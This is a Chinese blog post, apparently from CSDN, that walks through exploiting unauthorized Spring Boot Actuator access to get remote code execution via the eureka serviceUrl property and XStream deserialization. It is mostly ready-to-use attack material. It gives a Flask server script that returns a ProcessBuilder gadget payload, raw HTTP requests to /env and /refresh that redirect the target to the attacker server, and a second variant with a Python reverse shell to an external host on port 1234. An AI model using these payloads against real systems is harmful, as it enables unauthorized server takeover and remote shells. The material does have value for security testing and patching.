Spring Boot Actuator未授权访问远程代码执行_eureka_XStream反序列化

最新推荐文章于 2024-05-21 11:22:55 发布
最新推荐文章于 2024-05-21 11:22:55 发布
阅读量3.7k 收藏 2
点赞数
文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44146996/article/details/118808753
版权

文章目录

漏洞复现

扫描探测

使用的工具为:SB-Actuator
使用工具扫描发现目标地址存在Spring Boot Actuator未授权访问,可导致XStream反序列化RCE。
在这里插入图片描述

RCE

(1)编写利用脚本

执行的命令为ping DNSlog

#!/usr/bin/env python
# coding: utf-8

from flask import Flask, Response

app = Flask(__name__)


@app.route('/', defaults={'path': ''})
@app.route('/<path:path>', methods=['GET', 'POST'])
def catch_all(path):
  command = "ping DNSLOG"
  xml = """<linked-hash-set>
  <jdk.nashorn.internal.objects.NativeString>
    <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
      <dataHandler>
        <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
          <is class="javax.crypto.CipherInputStream">
            <cipher class="javax.crypto.NullCipher">
              <serviceIterator class="javax.imageio.spi.FilterIterator">
                <iter class="javax.imageio.spi.FilterIterator">
                  <iter class="java.util.Collections$EmptyIterator"/>
                  <next class="java.lang.ProcessBuilder">
                    <command>
                       <string>/bin/bash</string>
                       <string>-c</string>
                       <string>{command}</string>
                    </command>
                    <redirectErrorStream>false</redirectErrorStream>
                  </next>
                </iter>
                <filter class="javax.imageio.ImageIO$ContainsFilter">
                  <method>
                    <class>java.lang.ProcessBuilder</class>
                    <name>start</name>
                    <parameter-types/>
                  </method>
                  <name>foo</name>
                </filter>
                <next class="string">foo</next>
              </serviceIterator>
              <lock/>
            </cipher>
            <input class="java.lang.ProcessBuilder$NullInputStream"/>
            <ibuffer></ibuffer>
          </is>
        </dataSource>
      </dataHandler>
    </value>
  </jdk.nashorn.internal.objects.NativeString>
</linked-hash-set>""".format(command=command)
  return Response(xml, mimetype='application/xml')


if __name__ == "__main__":
    app.run(host='0.0.0.0', port=8090)

在这里插入图片描述

运行脚本
在这里插入图片描述

(2)设置 eureka.client.serviceUrl.defaultZone 属性

先查看原属性
在这里插入图片描述

http://${EUREKA_HOST}:${EUREKA_PORT}/eureka/,http://${EUREKA_HOST1}:${EUREKA_PORT}/eureka/

设置属性

POST /env HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Sec-Ch-Ua: " Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

eureka.client.serviceUrl.defaultZone=http://x.x.x.x:8090/mmd

在这里插入图片描述

(3)触发

刷新配置

POST /refresh HTTP/1.1
Host: x.x.x.x
Sec-Ch-Ua: " Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

在这里插入图片描述
在这里插入图片描述

反弹shell

#!/usr/bin/env python
# coding: utf-8

from flask import Flask, Response

app = Flask(__name__)


@app.route('/', defaults={'path': ''})
@app.route('/<path:path>', methods=['GET', 'POST'])
def catch_all(path):
  command = "python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"X.X.X.X\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);\'"
  xml = """<linked-hash-set>
  <jdk.nashorn.internal.objects.NativeString>
    <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
      <dataHandler>
        <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
          <is class="javax.crypto.CipherInputStream">
            <cipher class="javax.crypto.NullCipher">
              <serviceIterator class="javax.imageio.spi.FilterIterator">
                <iter class="javax.imageio.spi.FilterIterator">
                  <iter class="java.util.Collections$EmptyIterator"/>
                  <next class="java.lang.ProcessBuilder">
                    <command>
                       <string>/bin/bash</string>
                       <string>-c</string>
                       <string>{command}</string>
                    </command>
                    <redirectErrorStream>false</redirectErrorStream>
                  </next>
                </iter>
                <filter class="javax.imageio.ImageIO$ContainsFilter">
                  <method>
                    <class>java.lang.ProcessBuilder</class>
                    <name>start</name>
                    <parameter-types/>
                  </method>
                  <name>foo</name>
                </filter>
                <next class="string">foo</next>
              </serviceIterator>
              <lock/>
            </cipher>
            <input class="java.lang.ProcessBuilder$NullInputStream"/>
            <ibuffer></ibuffer>
          </is>
        </dataSource>
      </dataHandler>
    </value>
  </jdk.nashorn.internal.objects.NativeString>
</linked-hash-set>""".format(command=command)
  return Response(xml, mimetype='application/xml')


if __name__ == "__main__":
    app.run(host='0.0.0.0', port=8090)

在这里插入图片描述

(4)恢复 eureka.client.serviceUrl.defaultZone

设置属性
刷新配置

MD@@nr丫卡uer
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Spring Boot Actuator执行器运行原理详解
08-24
在本文中,我们将详细介绍 Spring Boot Actuator 执行器的运行原理,并通过示例代码对其进行说明,以便大家更好地理解和使用它。 一、启用 Spring Boot Actuator 要启用 Spring Boot Actuator,需要在构建配置文件...
Spring Boot Actuator授权访问到getshell
07-18
Spring Boot Actuator授权访问到getshell
SpringBoot Actuator授权访问漏洞的解决方法
MichaelZ的博客
05-08 2674
Spring Boot Actuator 是一个用于监控和管理 Spring Boot 应用程序的功能模块。它提供了一系列生产就绪的功能,帮助你了解应用程序的运行状况,以及在运行时对应用程序进行调整。Actuator 使用了 Spring MVC 来暴露各种 HTTP 或 JMX 端点,通过这些端点你可以获取到应用程序的运行信息,如健康状态、指标、线程 dump、环境变量等。健康检查:可以检查应用程序的运行状况,包括数据库连接、磁盘空间、服务状态等。指标收集。
Java配置47-Spring Eureka 授权访问漏洞修复
JustDI0209的博客
11-03 7314
Spring Security 5.7.0-M2 中,WebSecurityConfigurerAdapter 被弃用了,Spring 鼓励用户转向基于组件的安全配置。这是因为从 Spring Boot 2.0 开始,默认情况下会启用CSRF保护,以防止CSRF攻击应用程序,导致服务注册失败。实在没招了,只能怀疑用的框架版本太低,去重新整一个,eureka 就用了个服务发现,问题不大。刷新 eureka 页面,也没有服务信息,服务注册失败了。我试了几个方法,没有替换掉,靠你了,耿小姐。
Springboot Admin 整合 Spring Security 服务端与客户端加密,解决Actuator授权访问漏洞
最新发布
qq_44785123的博客
05-21 252
2、编写配置文件 3、编写配置类 4、启动项加注解 二、客户端-普通客户端 1、添加pom 2、编写配置文件 3、编写配置类 三、客户端-网关-SpringCloudGateway SpringCloud Gateway 网关作为 Springboot Admin客户端时,配置和普通客户端有所不同 2、编写配置文件 和普通客户端配置相同 四、注意事项 1、注册中心 如果使用eureka作为注册中心,客户端更改如下配置
spring boot远程代码执行漏洞复现
qq_63980959的博客
09-20 2238
目前我们所使用的https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-mysql-jdbc-rce靶场环境存在问题,需要进行相关配置。https://github.com/LandGrey/SpringBootVulExploit#0x07h2-database-console-jndi-rce上的该漏洞复现方式已经不能用了。如果你遇到了程序异常退出问题,可以尝试修改我们的java注入代码
漏洞复现 - - - Springboot授权访问
热门推荐
weixin_67503304的博客
09-05 2万+
讲解了 Springboot授权访问漏洞的原理,并且利用反弹shell的方式进行了漏洞复现,包括使用了powershell脚本文件
SpringCloud:Eureka访问权限配置
进击的小白
05-29 4841
一、场景 当需要连接eureka server不在同一个内网时,需要通过外网访问,这时为了防止外人看到相关信息,需要对其增加访问限制。 即可通过spring security组件进行安全控制。 二、实现 1.eureka server 1.1.引入jar包 在eureka server中引入security组件。 <dependency> <group...
Java第四十六天,SpringCloud框架系列(九),Eureka 问题修复
愿你饱经冷暖,仍保纯真
07-22 1214
Eureka 问题修复
spring-boot-base-master.zip_boot_spring boot_spring boot master_
09-24
在“spring-boot-base-master.zip”这个压缩包中,我们很可能是得到了一个基础的 Spring Boot 项目模板或者示例代码库,以帮助开发者快速上手。 Spring Boot 的核心特性包括: 1. **自动配置**:Spring Boot 可以...
spring-dubbo-spring-boot.rar_java编程_spring_spring boot_threwwab_
09-24
Spring Dubbo与Spring Boot整合应用详解》 在现代企业级开发中,Spring框架和其衍生的Spring Boot已经成为Java开发者的重要工具。同时,随着微服务架构的流行,Dubbo作为一款高效率的服务治理框架,也得到了广泛...
Spring Boot Actuator端点相关原理解析
08-18
Spring Boot Actuator 端点相关原理解析 Spring Boot Actuator 是一个功能强大且广泛使用的组件,它提供了众多的Web端点,通过这些端点,我们可以了解应用程序运行时的内部状况,掌握应用程序可以获取的环境属性...
Spring Boot Actuator 授权访问远程代码执行
qq_42947816的博客
07-05 2722
ActuatorSpring Boot提供的服务监控和管理中间件,默认配置会出现接口授权访问,部分接口会泄露网站流量信息和内存信息等,使用Jolokia库特性甚至可以远程执行任意代码,获取服务器权限
springboot集成eurekaeureka获取服务列表、EurekaURI路径存在授权访问
enthan809882的博客
02-16 3043
分为3个项目来讲解: 注册中心,provider,consumer 注册中心 注册中心pom.xml添加: <dependency> <groupId>org.springframework.cloud</groupId> <artifactId>spring-cloud-starter-netflix-eureka-server</art...
Springboot远程代码执行spring cloud SnakeYAML RCE)
qq_50854662的博客
06-27 770
Spring-boot远程代码执行系列(spring cloud SnakeYAML RCE)
Spring Boot Actuator授权访问排查和整改指南
weixin_44106034的博客
10-19 1万+
1、信息泄露:授权访问者可以通过Actuator端点获取敏感信息,如应用程序的配置信息、运行时环境、日志内容等。这些信息可以被攻击者用于识别系统的弱点,并进行更深入的攻击。2、使用默认的敏感端点路径:默认情况下,Actuator的一些敏感端点路径(如/actuator/shutdown、/actuator/env)可能对授权用户开放。2、系统破坏:攻击者可以通过Actuator端点的授权访问执行恶意操作,如修改配置、篡改数据、重启应用程序、关闭数据库连接等,从而破坏应用程序的正常运行。
【转载】JAVA常用组件授权漏洞解析
maoxiaotao的博客
02-04 550
在java项目中,经常会使用一些监控类的组件来监控系统的状态,如果对这些组件没有做好权限控制,公网可以任意访问的话,就会泄露敏感信息,进一步造成更严重的危害。今天就来看一下,都有哪些组件。
Spring Boot Actuator授权访问漏洞
qq_35456400的博客
08-10 1万+
Spring Boot Actuator 端点的授权访问漏洞是一个安全性问题,可能会导致授权的用户访问敏感的应用程序信息。可是并不用太过担心,Spring Boot Actuator 默认暴漏的信息有限,一般情况下并不会暴露敏感数据。注册中心有些功能集成了actuator,如果同时使用eurekaactuator,可以在eureka中点击注册链接查看健康状态信息(/actuator/info)。
spring端点扫描工具-SB-Actuator
siu~
08-14 512
Spring Boot Actuator授权访问【XXE、RCE】单/多目标检测

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值